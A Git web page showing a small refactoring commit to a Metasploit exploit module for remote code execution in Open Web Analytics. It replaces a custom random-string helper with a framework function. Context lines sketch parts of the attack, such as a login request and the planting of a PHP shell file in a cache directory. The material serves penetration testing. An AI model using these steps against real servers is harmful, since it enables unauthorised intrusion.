adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Use rand_text_alphanumeric function

Browse Source
This commit is contained in:
Pflegusch
2023-03-09 17:03:48 +01:00
parent 69839d1924
commit e66fd8f5ae
1 changed files with 2 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files
modules/exploits/multi/http/open_web_analytics_rce.rb
+2 -7
View File
@@ -92,7 +92,7 @@ class MetasploitModule < Msf::Exploit::Remote
'keep_cookies' => true,
'vars_post' => {
'owa_user_id' => username,
'owa_password' => get_random_string(8),
'owa_password' => rand_text_alphanumeric(8),
'owa_action' => 'base.login'
}
)
@@ -179,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Remote
'uri' => normalize_uri(target_uri.path, '/index.php?owa_do=base.optionsGeneral')
)
shell_filename = "#{get_random_string(8)}.php"
shell_filename = "#{rand_text_alphanumeric(8)}.php"
shell_url = "#{base_url}owa-data/caches/#{shell_filename}"
nonce = get_update_nonce(res)
@@ -250,11 +250,6 @@ class MetasploitModule < Msf::Exploit::Remote
url
end
def get_random_string(length)
chars = ('a'..'z').to_a + ('A'..'Z').to_a + (0..9).to_a
length.times.map { chars.sample }.join
end
def get_cache_content(cache_raw)
regex_cache_base64 = /\*(\w*)/
regex_result = cache_raw.match(regex_cache_base64)